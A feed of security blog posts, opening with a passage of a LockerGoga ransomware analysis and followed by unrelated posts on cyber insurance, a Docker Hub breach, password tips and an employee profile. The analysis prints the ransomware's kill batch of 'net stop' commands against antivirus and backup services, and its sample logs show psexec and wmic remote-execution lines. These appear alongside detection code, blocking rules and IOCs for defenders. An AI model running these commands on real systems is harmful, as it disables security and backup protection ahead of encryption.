net stop ReportServer$SYSTEM_BGC /y
net stop MSSQL$VEEAMSQL2008R2 /y
net stop ReportServer$TPS /y
net stop MSSQL$VEEAMSQL2012 /y
net stop ReportServer$TPSAMA /y
net stop MSSQLFDLauncher /y
net stop RESvc /y
net stop MSSQLFDLauncher$PROFXENGAGEMENT /y
net stop sacsvr /y
net stop MSSQLFDLauncher$SBSMONITORING /y
net stop MSSQLFDLauncher$SHAREPOINT /y
net stop SamSs /y
net stop MSSQLFDLauncher$SQL_2008 /y
net stop SAVAdminService /y
net stop MSSQLFDLauncher$SYSTEM_BGC /y
net stop SAVService /y
net stop MSOLAP$TPSAMA /y
net stop MSSQLFDLauncher$TPS /y
net stop MSSQL$BKUPEXEC /y
net stop MSSQLFDLauncher$TPSAMA /y
net stop SDRSVC /y
net stop SQLSafeOLRService /y
net stop SepMasterService /y
net stop SQLSERVERAGENT /y
net stop ShMonitor /y
net stop SQLTELEMETRY /y
net stop Smcinst /y
net stop SQLTELEMETRY$ECWDB2 /y
net stop SmcService /y
net stop SQLWriter /y
net stop SMTPSvc /y
net stop SstpSvc /y
net stop SNAC /y
net stop svcGenericHost /y
net stop SntpService /y
net stop swi_filter /y
net stop sophossps /y
net stop swi_service /y
net stop SQLAgent$BKUPEXEC /y
net stop swi_update_64 /y
net stop SQLAgent$ECWDB2 /y
net stop TmCCSF /y
net stop SQLAgent$PRACTTICEBGC /y
net stop tmlisten /y
net stop SQLAgent$PRACTTICEMGT /y
net stop TrueKey /y
net stop SQLAgent$PROFXENGAGEMENT /y
net stop TrueKeyScheduler /y
net stop SQLAgent$SBSMONITORING /y
net stop TrueKeyServiceHelper /y
net stop SQLAgent$SHAREPOINT /y
net stop SQLAgent$SQL_2008 /y
net stop UI0Detect /y
net stop SQLAgent$SYSTEM_BGC /y
net stop SQLAgent$TPS /y
net stop VeeamBackupSvc /y
net stop SQLAgent$TPSAMA /y
net stop VeeamBrokerSvc /y
net stop SQLAgent$VEEAMSQL2008R2 /y
net stop SQLAgent$VEEAMSQL2012 /y
net stop VeeamCatalogSvc /y
net stop SQLBrowser /y
net stop VeeamCloudSvc /y
net stop SDRSVC /y
net stop SQLSafeOLRService /y
net stop SepMasterService /y
net stop SQLSERVERAGENT /y
net stop ShMonitor /y
net stop SQLTELEMETRY /y
net stop VeeamDeploymentService /y
net stop NetMsmqActivator /y
net stop VeeamDeploySvc /y
net stop EhttpSrv /y
net stop VeeamEnterpriseManagerSvc /y
net stop ekrn /y
net stop VeeamMountSvc /y
net stop ESHASRV /y
net stop VeeamNFSSvc /y
net stop MSSQL$SOPHOS /y
net stop VeeamRESTSvc /y
net stop SQLAgent$SOPHOS /y
net stop VeeamTransportSvc /y
net stop AVP /y
net stop W3Svc /y
net stop klnagent /y
net stop wbengine /y
net stop MSSQL$SQLEXPRESS /y
net stop WRSVC /y
net stop SQLAgent$SQLEXPRESS /y
net stop wbengine /y
net stop MSSQL$VEEAMSQL2008R2 /y
net stop kavfsslp /y
net stop SQLAgent$VEEAMSQL2008R2 /y
net stop VeeamHvIntegrationSvc /y
net stop KAVFSGT /y
net stop swi_update /y
net stop KAVFS /y
net stop SQLAgent$CXDB /y
net stop mfefire /y
net stop SQLAgent$CITRIX_METAFRAME /y
net stop "SQL Backups" /y
net stop "avast! Antivirus" /y
net stop MSSQL$PROD /y
net stop aswBcc /y
net stop "Zoolz 2 Service" /y
net stop "Avast Business Console Client Antivirus Service" /y
net stop MSSQLServerADHelper /y
net stop mfewc /y
net stop SQLAgent$PROD /y
net stop Telemetryserver /y
net stop msftesql$PROD /y
net stop WdNisSvc /y
net stop WinDefend /y
net stop EPUpdateService /y
net stop MCAFEETOMCATSRV530 /y
net stop TmPfw /y
net stop MCAFEEEVENTPARSERSRV /y
net stop SentinelAgent /y
net stop MSSQLFDLauncher$ITRIS /y
net stop SentinelHelperService /y
net stop MSSQL$EPOSERVER /y
net stop LogProcessorService /y
net stop MSSQL$ITRIS /y
net stop EPUpdateService /y
net stop SQLAgent$EPOSERVER /y
net stop TmPfw /y
net stop SQLAgent$ITRIS /y
net stop SentinelAgent /y
net stop SQLTELEMETRY$ITRIS /y
net stop SentinelHelperService /y
net stop MsDtsServer130 /y
net stop LogProcessorService /y
net stop SSISTELEMETRY130 /y
net stop EPUpdateService /y
net stop MSSQLLaunchpad$ITRIS /y
net stop TmPfw /y
net stop BITS /y
net stop SentinelAgent /y
net stop BrokerInfrastructure /y
net stop EPProtectedService /y
net stop epag /y
net stop epredline /y
net stop EPIntegrationService /y
net stop EPSecurityService /y
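As an added example (not McAfee's code, and separate from the expert rules given later in this post), the following Python shows how the two spreading commands and the kill batch above look to a defender reading process-creation logs: it flags remote launches of a .bat from a windows\temp folder via psexec or wmic, and bursts of net stop commands against security or backup services on a single host. The log lines, hostnames, IP address and account name are constructed; the service names are taken from the batch file above.

```python
"""
Two detections over process-creation command lines, written against
constructed sample log records of the form (iso_timestamp, host, cmdline).
"""
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Security and backup service names taken from the kill batch above.
PROTECTED_SERVICES = {
    "mcshield", "mfemms", "mfevtp", "mfefire", "windefend", "wdnissvc",
    "sentinelagent", "sentinelhelperservice", "savservice", "savadminservice",
    "sophossps", "ekrn", "avp", "klnagent", "ntrtscan", "tmlisten", "mbamservice",
    "veeambackupsvc", "backupexecjobengine", "wbengine", "sdrsvc",
}

# 'net stop <name>' or 'net stop "<name with spaces>"'
NET_STOP = re.compile(r'\bnet\s+stop\s+(?:"([^"]+)"|(\S+))', re.IGNORECASE)
# psexec targeting a UNC host, or wmic with a /node: argument
REMOTE_EXEC = re.compile(r"\b(?:psexec(?:\.exe)?\s+\\\\\S+|wmic\s+/node:)", re.IGNORECASE)
# a .bat living under \windows\temp\
TEMP_BAT = re.compile(r'\\windows\\temp\\[^\s"]+\.bat', re.IGNORECASE)

# Constructed sample log (hosts, IP, account and timestamps are made up).
SAMPLE_LOG = [
    ("2019-03-19T02:10:05", "srv-fs01",
     r'start psexec.exe \\10.0.0.23 -u corp\svc -p "pass" -d -h -r mstdc -s accepteula -nobanner c:\windows\temp\xax.bat'),
    ("2019-03-19T02:10:12", "srv-fs01",
     r'start wmic /node:"10.0.0.23" /user:"corp\svc" /password:"pass" process call create "cmd /c c:\windows\temp\kill.bat"'),
    ("2019-03-19T02:10:13", "ws-0417", r"cmd /c c:\windows\temp\kill.bat"),
    ("2019-03-19T02:10:14", "ws-0417", "net stop McShield /y"),
    ("2019-03-19T02:10:14", "ws-0417", "net stop WinDefend /y"),
    ("2019-03-19T02:10:15", "ws-0417", 'net stop "SQL Backups" /y'),
    ("2019-03-19T02:10:15", "ws-0417", "net stop SentinelAgent /y"),
    ("2019-03-19T02:10:16", "ws-0417", "net stop VeeamBackupSvc /y"),
    ("2019-03-19T09:30:00", "ws-0099", "net stop Spooler /y"),  # routine admin action
]


def remote_batch_launches(log):
    """(timestamp, host) of command lines that run a .bat from a remote
    host's windows temp folder through psexec or wmic."""
    return [(ts, host) for ts, host, cmd in log
            if REMOTE_EXEC.search(cmd) and TEMP_BAT.search(cmd)]


def stopped_service(cmd):
    """Lowercased service name targeted by a 'net stop' command, or None."""
    m = NET_STOP.search(cmd)
    if not m:
        return None
    return (m.group(1) or m.group(2)).lower()


def service_kill_bursts(log, window_seconds=60, min_services=3):
    """Hosts on which at least min_services distinct protected services were
    stopped inside one sliding time window; returns {host: sorted names}."""
    per_host = defaultdict(list)
    for ts, host, cmd in log:
        name = stopped_service(cmd)
        if name in PROTECTED_SERVICES:
            per_host[host].append((datetime.fromisoformat(ts), name))
    alerts = {}
    window = timedelta(seconds=window_seconds)
    for host, stops in per_host.items():
        stops.sort()
        for i, (start, _) in enumerate(stops):
            names = {n for t, n in stops[i:] if t - start <= window}
            if len(names) >= min_services:
                alerts[host] = sorted(names)
                break
    return alerts


if __name__ == "__main__":
    print("remote .bat launches:", remote_batch_launches(SAMPLE_LOG))
    print("service kill bursts:", service_kill_bursts(SAMPLE_LOG))
```

The local `cmd /c c:\windows\temp\kill.bat` line on ws-0417 is deliberately not flagged by the first rule (it is the execution, not the remote delivery); it is the burst rule that catches that host. A single `net stop Spooler` on another host stays below the threshold, which is what keeps this rule usable next to routine administration.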

New ransomware, new features, but still room to improve

We will continue tracking LockerGoga, but we have already seen some interesting features not seen before, such as encrypting the system with parallel tasks or writing log files for debugging purposes. We did not see any spreading method used to deliver LockerGoga, so it is fair to assume it is used in targeted campaigns after the attackers already had access to the system. At the time of this analysis, none of the samples are packed or use complex methods of protection against being executed inside a sandbox system, though this could change in the near future.

Also, during the analysis, we observed LockerGoga encrypting legitimate DLLs, breaking the functionality of certain applications in the system, and even encrypting its own binary during the process, causing a crash:

We expect all these errors will be fixed with further development of the malware.

Observations:

The McAfee ATR team is observing how some new ransomware players in the cybersecurity field are reusing, or at least only making some minor modifications to, some features used by other ransomware families.

In the case of LockerGoga we can observe the following:

  • Sectigo-issued certificates used to digitally sign the samples
  • A ransom note slightly modified from the Ryuk ransomware note
  • A specific FileMarker used to flag the encrypted files
  • No BTC address in the ransom note, meaning victims must make contact directly by email, something we have also seen elsewhere in our latest investigations.

MITRE ATT&CK Coverage:

Hooking

Kernel Modules and Extensions

Process Injection

Code Signing

Query Registry

Process Discovery

Data Compressed

McAfee coverage:

Detection names: 

RansomCLock-FAL!A5BC1F94E750

Ransom-Goga!E11502659F6B

Trojan-Ransom

Ransom-Goga!438EBEC995AD

Trojan-FQSS!3B200C8173A9

RansomCLock-FAL!A1D732AA27E1

Ransom-Goga!C2DA604A2A46

Ransom-O

Trojan-FPYT!BA53D8910EC3

Ransom-FQPT!FAF4DE4E1C5D

RansomCLock-FAL!3EBCA21B1D4E

RansomCLock-FAL!E8C7C902BCB2

Ransom-Goga!E11502659F6B

Generic.bvg

Ransom-Goga!16BCC3B7F32C

Expert Rules

The following expert rules can be used in Endpoint Security to block the malware from spreading. These rules are aggressive and may cause false positives, so make sure they are removed once the environment is cleaned:

Rule {
    Process {
        Include OBJECT_NAME { -v "SYSTEM:REMOTE" }
    }
    Target {
        Match FILE {
            Include OBJECT_NAME { -v "c:\\windows\\temp\\*.exe" }
            Include OBJECT_NAME { -v "c:\\windows\\temp\\*.bat" }
            Include -access "CREATE"
        }
    }
}

Rule {
    Process {
        Include OBJECT_NAME { -v "WmiPrvSE.exe" }
    }
    Target {
        Match PROCESS {
            Include OBJECT_NAME { -v "cmd.exe" }
            Include -access "CREATE"
        }
    }
}

Prescriptive guidance

It is advisable for customers to undertake an appropriate risk assessment to determine whether this threat has a high probability of targeting their environments. While the known samples detailed above are detected by McAfee technologies, customers can also add the following Access Protection rules to prevent the creation of encrypted files on the victim host:

Executables:

  • Inclusion Status: Include
  • File Name or Path: *

SubRule:

  • Type: File
  • Operations: Create
  • Targets:
    • Target 1:
      • Include
      • Files: *.locked
    • Target 2:
      • Include
      • Destination file: *.locked

Customers can also add the following Access Protection rule to prevent the creation of encrypted files on the victim host:

  • File/Folder Access Protection Rule: Processes to include: *
  • File or folder name to block: *.locked
  • File actions to prevent: New files being created

Access Protection Rules:

Customers can also add Access Protection rules matching these characteristics: Prevent Creation\Execution of:

  • c:\windows\temp\x??.bat
  • c:\windows\temp\kill.bat
  • c:\windows\temp\taskhost.exe

Prevent execution of binaries signed with SN (subject name):

  • C=GB, PostalCode=DT3 4DD, S=WEYMOUTH, L=WEYMOUTH, STREET=16 Australia Road Chickerell, O=MIKL LIMITED, CN=MIKL LIMITED
  • C=GB, PostalCode=WC2H 9JQ, S=LONDON, L=LONDON, STREET=71-75 Shelton Street Covent Garden, O=ALISA LTD, CN=ALISA LTD
  • C=GB, PostalCode=EC1V 2NX, S=LONDON, L=LONDON, STREET=Kemp House 160 City Road, O=KITTY’S LTD, CN=KITTY’S LTD

YARA RULE

We have a YARA rule available on our ATR github repository:

IOCs

a52f26575556d3c4eccd3b51265cb4e6

ba53d8910ec3e46864c3c86ebd628796

c2da604a2a469b1075e20c5a52ad3317

7e3f8b6b7ac0565bfcbf0a1e3e6fcfbc

3b200c8173a92c94441cb062d38012f6

438ebec995ad8e05a0cea2e409bfd488

16bcc3b7f32c41e7c7222bf37fe39fe6

e11502659f6b5c5bd9f78f534bc38fea

9cad8641ac79688e09c5fa350aef2094

164f72dfb729ca1e15f99d456b7cf811

52340664fe59e030790c48b66924b5bd

174e3d9c7b0380dd7576187c715c4681

3ebca21b1d4e2f482b3eda6634e89211

a1d732aa27e1ca2ae45a189451419ed5

e8c7c902bcb2191630e10a80ddf9d5de

4da135516f3da1c6ca04d17f83b99e65

a5bc1f94e7505a2e73c866551f7996f9

b3d3da12ca3b9efd042953caa6c3b8cd

faf4de4e1c5d8e4241088c90cfe8eddd

dece7ebb578772e466d3ecae5e2917f9

MayarChenot@protonmail[.]com

DharmaParrack@protonmail[.]com

wyattpettigrew8922555@mail[.]com

SayanWalsworth96@protonmail[.]com

SuzuMcpherson@protonmail[.]com

AbbsChevis@protonmail[.]com

QicifomuEjijika@o2[.]pl

RezawyreEdipi1998@o2[.]pl

AsuxidOruraep1999@o2[.]pl

IjuqodiSunovib98@o2[.]pl

aperywsqaroci@o2[.]pl

abbschevis@protonmail[.]com

asuxidoruraep1999@o2[.]pl

cottleakela@protonmail[.]com

couwetizotofo@o2[.]pl

dharmaparrack@protonmail[.]com

dutyuenugev89@o2[.]pl

phanthavongsaneveyah@protonmail[.]com

mayarchenot@protonmail[.]com

ijuqodisunovib98@o2[.]pl

qicifomuejijika@o2[.]pl

rezawyreedipi1998@o2[.]pl

qyavauzehyco1994@o2[.]pl

romanchukeyla@protonmail[.]com

sayanwalsworth96@protonmail[.]com

schreibereleonora@protonmail[.]com

suzumcpherson@protonmail[.]com

wyattpettigrew8922555@mail[.]com
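The list above mixes defanged addresses (written with “[.]”) with the same mailbox repeated in different capitalisations, both of which a naive string match against logs would miss. The following Python is an added example (not McAfee's tooling) that refangs, lowercases and deduplicates a subset of these indicators, sorts them by type, and then matches them against two constructed log lines.

```python
"""
Normalise published indicators before matching them against logs.
Indicator values are a subset of the IOC list above, copied as printed;
the log lines are constructed and not real telemetry.
"""
import re

RAW_IOCS = [
    "a52f26575556d3c4eccd3b51265cb4e6",
    "ba53d8910ec3e46864c3c86ebd628796",
    "MayarChenot@protonmail[.]com",
    "mayarchenot@protonmail[.]com",      # same mailbox, different case
    "DharmaParrack@protonmail[.]com",
    "dharmaparrack@protonmail[.]com",
    "QicifomuEjijika@o2[.]pl",
]

# Constructed sample log lines (hostnames, recipients and timestamps are made up).
SAMPLE_LINES = [
    "2019-03-19 02:12:44 mailgw inbound from=<MayarChenot@protonmail.com> to=<cfo@corp.example> subject=README",
    "2019-03-19 02:15:01 edr file=c:\\windows\\temp\\taskhost.exe md5=A52F26575556D3C4ECCD3B51265CB4E6",
    "2019-03-19 08:00:00 mailgw inbound from=<newsletter@vendor.example> subject=Weekly",
]

MD5_RE = re.compile(r"^[0-9a-f]{32}$")
EMAIL_RE = re.compile(r"^[^@\s]+@[^@\s]+\.[a-z]{2,}$")


def refang(value):
    """Undo the common defanging conventions used when publishing indicators."""
    return (value.replace("[.]", ".").replace("(.)", ".")
                 .replace("[@]", "@").replace("hxxp", "http"))


def normalise(raw):
    """Group indicators by type after refanging, lowercasing and deduplicating."""
    groups = {"md5": set(), "email": set(), "other": set()}
    for value in raw:
        value = refang(value.strip()).lower()
        if MD5_RE.match(value):
            groups["md5"].add(value)
        elif EMAIL_RE.match(value):
            groups["email"].add(value)
        else:
            groups["other"].add(value)
    return groups


def match_lines(lines, iocs):
    """(line_index, indicator) pairs for lines containing any indicator.
    The comparison is case-insensitive because hashes and mailboxes are
    logged in whatever case the producing system happens to use."""
    hits = []
    wanted = iocs["md5"] | iocs["email"]
    for idx, line in enumerate(lines):
        low = line.lower()
        for ioc in sorted(wanted):
            if ioc in low:
                hits.append((idx, ioc))
    return hits


if __name__ == "__main__":
    iocs = normalise(RAW_IOCS)
    print(iocs)
    print(match_lines(SAMPLE_LINES, iocs))
```

Seven published values collapse to five usable ones, and the EDR line is matched even though it logs the hash in upper case; the same normalisation is what you would apply before loading the list into a SIEM lookup table.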

The post LockerGoga Ransomware Family Used in Targeted Attacks appeared first on McAfee Blogs.

What This Report on Cyber Risk Gets Wrong

The Marsh brokerage unit of Marsh and McLennan recently announced a new evaluation process called Cyber Catalyst designed to determine the usefulness of enterprise cyber risk tools.

The goal of the new offering is to identify and implement industry-wide standards to help cyber insurance policyholders make more informed decisions about cyber-related products and services; basically, what works and what doesn’t. Other major insurers participating in Cyber Catalyst include Allianz, AXA XL, AXIS, Beazley, CFC, and Sompo International.

While this collaboration between insurance companies is unusual, it’s not entirely surprising. Cyber insurance is a $4 billion market globally. While it’s difficult to accurately gauge how many hacking attempts were successfully foiled by the products targeted here, data breaches and cyber attacks on businesses continue to increase in frequency and severity. The 2019 World Economic Forum’s Global Risks Report ranks “massive data fraud and theft” as the fourth greatest global risk, followed by “cyber-attacks” in fifth place.

Meanwhile, cybersecurity products and vendors have been, to be charitable, a mixed bag.

Good in Theory

From this standpoint, Cyber Catalyst seems like not just a good idea, but an obvious one. A standardized metric to determine which cybersecurity solutions are no better than a fig leaf and which ones provide real armor to defend against cyberattacks is sorely lacking in the cybersecurity space. By Marsh’s own estimates, there are more than three thousand cybersecurity vendors amounting to a $114 billion marketplace. Many of them don’t inspire confidence on the part of businesses.

Insurers have a vested interest in determining the effectiveness of cybersecurity products, weeding out buggy software and promoting effective solutions that can help address risk aggregation issues. Businesses and their data are in turn better protected, and at least in theory, they would pay less for coverage. Everyone wins.

Insurance companies did something similar in the 1950s with the creation of the Insurance Institute for Highway Safety. In the face of rising traffic collisions and fatalities, the insurance industry collaborated to establish a set of tests and ratings for vehicles, and the result has been a gold standard for automotive safety for decades. Using a similar strategy for cybersecurity would at least in theory help mitigate the ever-increasing costs and risks to companies and their data.

Or Maybe Not

Where the analogy to the Insurance Institute for Highway Safety breaks down is here: the threats to car drivers and passengers have ultimately stayed the same since its inception. Everything we’ve learned over the years about making cars has progressively led to safer vehicles. Information technology is vastly different, in that iterative improvements in one specific area don’t necessarily make an organization as a whole safer or better protected against cyber threats; in fact, sometimes the opposite happens, when a newly added feature turns out to be a bug.

Cyber defenses are meaningless in the presence of an unintended, yet gaping, hole in an organization’s defenses. Then there is the march of sound innovation. Products that provided first-in-class protection for a business’s network a few years ago may no longer be so great where cloud computing and virtual servers, or BYOD are concerned. The attackable surface of every business continues to increase with each newly introduced technology, and it seems overly optimistic to assume the standard evaluation process (currently twice a year) would be able to keep pace with new threats.

There’s also the risk of putting too many eggs into one basket. While the diffuse nature of the cybersecurity market causes headaches for everyone involved, establishing a recommended solution or set of solutions effectively makes them an ideal target for hackers. While it’s important to keep consumers and businesses informed of potential risk to their information, cybersecurity issues require a certain amount of secrecy until they have been properly addressed. Compromising, or even identifying and reporting on a vulnerability before it’s been patched in an industry standard security product, process or vendor practice could cause a potentially catastrophic chain reaction for cyber insurers and their clients.

Culture Eats Strategy for Breakfast

Where the Cyber Catalyst program seems to potentially miss the mark is by overlooking the weakest link in any company’s security (i.e., its users). An advanced cybersecurity system or set of tools capable of blocking the most insidious and sophisticated attack can readily be circumvented by a spear phishing campaign, a compromised smartphone, or a disgruntled employee. Social engineering cannot be systematically addressed. Combatting the lures of compromise requires organizations to foster and maintain a culture of privacy and security.

The risk of employee over-reliance on tools and systems at the expense of training, awareness, and a company culture where cybersecurity is front and center must not be underestimated. While it is easier to opt for the quick and easy approach of purchasing a recommended solution, companies still need a comprehensive and evolving playbook to meet the ever-changing tactics of persistent, sophisticated and creative hackers.

While industry-wide cooperation may be a good thing, it’s vital for companies and insurers alike to recognize that any security program or service is fallible. Without an equal investment in functional cybersecurity, which places as much store in training employees and keeping aware of new threats, the rise in breaches and compromises will continue.

This article originally appeared on Inc.com.

The post What This Report on Cyber Risk Gets Wrong appeared first on Adam Levin.

TrustArc to Sponsor IAPP Global Privacy Summit 2019

TrustArc is excited to be part of the IAPP Global Privacy Summit in Washington, DC this week! The 2019 Summit will gather more than 3,600 professionals from all over the globe for an engaging program full of privacy experts. The conference features four days of education, guidance, inspiration and connections that will spotlight the big picture of data protection. To kick the conference off, TrustArc is hosting a Welcome Party with partner RADAR on Wednesday, May 1st. Clients, partners and friends will get together over drinks and food to network and touch base before diving into the following day’s first … Continue reading TrustArc to Sponsor IAPP Global Privacy Summit 2019

The post TrustArc to Sponsor IAPP Global Privacy Summit 2019 appeared first on TrustArc Blog.

Docker Hub Database Breached, As Many As 190,000 Accounts Affected


Docker, a company that created an open platform for building and running distributed applications, reported to users that its Docker Hub database had been breached, exposing sensitive data from approximately 190,000 accounts. While that figure makes up less than five percent of Hub users, the data included some usernames and hashed passwords as well as Github and Bitbucket tokens for Docker autobuild. The company reported that the tokens have been revoked, and said it “acted quickly to intervene and secure the site.”

Experts who spoke with Motherboard indicated that the worst-case scenario is that hackers gain access to proprietary source code of some of those accounts. For context, companies on Docker’s roster include the likes of Paypal and Visa. Microsoft quickly reported that its official files hosted in Docker Hub were not compromised.

According to Veracode CTO Chris Wysopal, it is not yet known what the underlying vulnerability was at Docker Hub, but it is a serious breach as attackers could use the access tokens to get at a company’s source code. It is unclear if the attackers would have write privileges, which would enable backdooring into the code. Wysopal said each customer that was notified should be resetting access tokens and looking at logs for access. With revision control, this is all heavily audited.

Since Docker notified customers quickly, hopefully the impact is limited. The company emailed those impacted by the breach directly with a password reset link. Customers using autobuilds should check to ensure that their GitHub or Bitbucket repositories are still linked to the Docker Hub to ensure autobuilds work correctly moving forward.

Thousands of companies and millions of developers around the world use Docker to run containers, which are software packages that include code, runtime, settings, system libraries, and system tools. By isolating software from its surroundings, software containers enable code to always run the same regardless of the environment it is operating within. Although the company is still investigating the breach, if hackers have access to the private code in the repositories, they may be able to inject malicious code into software autobuilt by Docker.

Digital Parenting: ‘Eat Your Veggies, Brush Your Teeth, Strengthen Your Passwords’


As adults, we know the importance of strong passwords, and we’ve likely preached the message to our kids. But let’s rewind for a minute. Do our kids understand why strong passwords are important and why they need to become a habit, much like personal health and hygiene?

If we want the habit to stick, the reason why can’t be simply because we told them so. We’ve got to make it personal and logical.

Think about the habits you’ve already successfully instilled and the reasoning you’ve attached to them.

Brush your teeth to prevent disease and so they don’t fall out.
Eat a balanced diet so you have fuel for the day and to protect yourself from illness and disease.
Get enough sleep to restore your body and keep your mind sharp for learning.
Bathe and groom to wash away germs (and to keep people from falling over when you walk by). 

The same reasoning applies to online hygiene: We change our passwords (about every three months) to stay as safe as possible online and protect what matters. When talking to kids, the things that matter include our home address, our school name, our personal information (such as a parent’s credit card information, our social security number, or other account access).

Kids Targeted

We falsely believe that an adult’s information is more valuable than a child’s. On the contrary, given a choice, 10 out of 10 hackers would mine a child’s information over an adult’s because it’s unblemished. Determined identity thieves will use a child’s Social Security number to apply for government benefits, open bank and credit card accounts, apply for a loan or utility service, or rent an apartment. Also, once a child’s information is hacked, a thief can usually get to a parent’s information.

How to Stay Safe

It’s a tall task to prevent some of the massive data breaches in the news that target kids’ information. However, what is in our control is the ability to practice and teach healthy password habits in our home.

Tips for Families

Shake it up. According to McAfee Chief Consumer Security Evangelist Gary Davis, to bulletproof your passwords, make sure they are at least 12 characters long and include numbers, symbols, and upper and lowercase letters. Consider substituting numbers and symbols for letters, such as zero for “O” or @ for “A”.

Encourage kids to get creative and create passwords or phrases that mean something to them. For instance, advises Gary, “If you love crime novels you might pick the phrase: ILoveBooksOnCrime. Then you would substitute some letters for numbers and characters, and put a portion in all caps to make it even stronger, such as 1L0VEBook$oNcRIM3!”

Three random words. Password wisdom has morphed over the years as we learn more and more about hacking practices. According to the National Cyber Security Centre, another way to create a strong password is by using three random words (not birthdates, addresses, or sports numbers) that mean something to you. For instance: ‘lovepuppypaws’ or ‘drakegagacardib’ or ‘eatsleeprepeat’ or ‘tacospizzanutella’.

More than one password. Creating a new password for each account will head off cybercriminals if any of your other passwords are cracked. Consider a password manager to help you keep track of your passwords.

Change product default passwords immediately. If you purchase products for kids such as internet-connected gaming devices, routers, or speakers, make sure to change the default passwords to something unique, since hackers often know the manufacturer’s default settings.

When shopping online, don’t save info. Teach kids that when shopping on their favorite retail or gaming sites, not to save credit card information. Saving personal information to different accounts may speed up the checkout process. However, it also compromises data.

Employ extra protection. Comprehensive security software can protect you from several threats such as viruses, identity theft, privacy breaches, and malware designed to grab your data. Security software can cover your whole family as well as multiple devices.

Web Advisor. Keep your software up-to-date with a free web advisor that helps protect you from accidentally typing passwords into phishing sites.


Use unique passwords and MFA. This is also called “layering up.” 1) Use unique passwords for each of your accounts. By using different passwords, you avoid having all of your accounts become vulnerable if one of them is hacked (think domino effect). 2) MFA is Multi-Factor Authentication (also called two-step verification or authentication). MFA confirms a user’s identity only after they present two or more pieces of evidence. Though not 100% secure, this practice adds a layer of security to an account.

Keep it private. Kids love to show one another loyalty by sharing passwords and giving one another access to their social network accounts. DO NOT encourage this behavior. It’s reckless and could carry some serious privacy consequences. (Of course, sharing with parents is recommended.)

Credential Cracking

According to the Identity Theft Resource Center® (ITRC), the reported number of consumer records exposed containing sensitive personally identifiable information jumped 126 percent in 2018. The report explicitly stated password cracking as an issue: “The exploitation of usernames and passwords by nefarious actors continues to be a ripe target due to the increase in credential cracking activities – not to mention the amount of data that can be gleaned by accessing accounts that reuse the same credentials.”

May 2 is World Password Day and the perfect time to consider going over these password basics with your family.

The post Digital Parenting: ‘Eat Your Veggies, Brush Your Teeth, Strengthen Your Passwords’ appeared first on McAfee Blogs.

Webroot Culture: Serena Peruzzi Shares Her Side

Reading Time: ~4 min.

Today we chat with Web Analyst Manager Serena Peruzzi. Serena constantly filters through the web to analyze content. Sometimes her position requires looking through difficult material, but other times you can find her traveling, organizing company events, and even gardening!  

See how Serena helps build Webroot’s company culture in this Employee Spotlight.

How did you get into the technology field? 

During my undergrad in Translation and Interpreting 10 years ago, I came to realize how big a role automation and machine translation were going to play in my field. Thus, I decided to beat the trend to the punch and focus my research on Google Translate for my thesis; further on, I completed a master’s degree in Translation Technology, which mixed together traditional translation with state-of-the-art localization technologies, and included leveraging on Machine Learning and language pattern recognition to build automated translation engines. Google Translate pretty much rules the multilingual content scene for the general public, making content in more than 100 languages immediately accessible to the global audience with just one click. Also, a lot of crowdsourced content, for example travel or business reviews on the web, is localized using machine translation technologies to maximize international reach. Additionally, many large corporations already leverage on customized enterprise machine translation engines to translate manuals and other documentation. There are already technologies allowing you to converse in multiple languages in real time, so there are virtually no language barriers that cannot be overcome anymore; of course, provided you have an internet connection.

What does a week as a Web Analyst Manager look like? 

I typically have a few one-on-one calls with all remote Web Analysts on a weekly or bi-weekly basis, and two team meetings per week, one with the US and one with Sydney. We discuss top issues, upcoming tool updates and feature releases, and use the wisdom of the crowd to find a solution to difficult cases. We use a collaborative Kanban board to track the topics we discuss, so that we can always go back to them or track progress on resolutions. Finally, I work on a number of projects related to training, quality assessments, classification approvals, new implementations, case escalations from the team, and documentation. I also have a few gardening tasks to take care of, keeping the Webroot Threat plants alive is quite an arduous task!  

What have you learned / what skills have you built in this role? 

Customer care, URL threat analysis, and all aspects of people management are among the key skills I learned in the role. It also helped me keep up my passion for foreign languages, especially Spanish and Japanese, since I need to analyze web content from all over the world. 

What is the hardest thing about being a Web Analyst Manager? 

Explaining what a Web Analyst does is quite an arduous task, partially because it is a very complex and multi-faceted role involving analyzing large amounts of online content, but also because it involves, to some extent, evaluating content that may be disturbing or violent in nature, and it can be a difficult sell at times. 

What is your greatest accomplishment in your career at Webroot so far? 

Having helped build a global team of brilliant and enthusiastic minds is perhaps what makes me most proud of being a part of Webroot. The Web Analysts are first and foremost masters of languages and cultures; collectively we speak 12 different languages. The more languages you know, the more confidence you have in analyzing online content from all over the world, bringing different perspectives to the mix. Also, we have another element in common: we all want to make the internet a little safer for our user base. Because of that, building the team has always been an incredibly fun experience. It allows candidates to bring up their unique backgrounds and passions for different cultures and the IT security world in their interviews. 

Does your work allow you to travel a lot? Where are some of the coolest places you have travelled?  

I’ve travelled to San Diego, Colorado and Sydney with Webroot. While I enjoyed all my trips, I do have a weak spot for Australia. I am a big fan of water sports, and Australia offers the best sceneries for surfing and diving. It also hosts some of the most amazing animals I’ve ever seen. I’ll admit that my encounter with a group of Huntsmen in Sydney, despite being harmless spiders, had me run away fast. But when I first met Quokkas (smiling furry animals), they literally melted my heart.

Best career advice you’ve received? 

There’s a saying in Ireland which can be used as an antidote when things don’t go your way, “What’s for you won’t pass you.” I felt particularly close to it when I couldn’t attain a role in the past, as it ultimately led me to a different, extremely satisfactory role surrounded by amazing people. 

Are you involved in anything at Webroot outside of your day to day work? 

Aside from gardening, I’ve given a hand with organizing team-building and social events for Dublin in the past, including Christmas parties, Health Day, mini-golf and bubble football tournaments, and escape room challenges. Since the team is spread across three offices, team events vary based on group size and local amenities. In Ireland, we typically go out for a nice meal once a month, and order in food for celebrations; additionally, there are regular pub sessions with other Webroot teams. We also have office-wide team building activities on a quarterly basis, and/or when we have visitors on-site.  

Favorite memory on the job? 

St Patrick’s Day in the office, when I was in Support, was also a truly fun day. On our lunch break we went to Temple Bar, the very core of St Patrick’s celebrations, hid amongst the mayhem of thousands of party-goers celebrating, and then pinged the US team to spot us on the live street camera, just like in a game of “Where’s Waldo.” 

To learn more about life at Webroot, visit https://www.webroot.com/blog/category/life-at-webroot/

The post Webroot Culture: Serena Peruzzi Shares Her Side appeared first on Webroot Blog.

High Value Cryptocurrency Stolen by Hackers

Reading Time: ~2 min.

Hackers Breach Private Keys to Steal Cryptocurrency

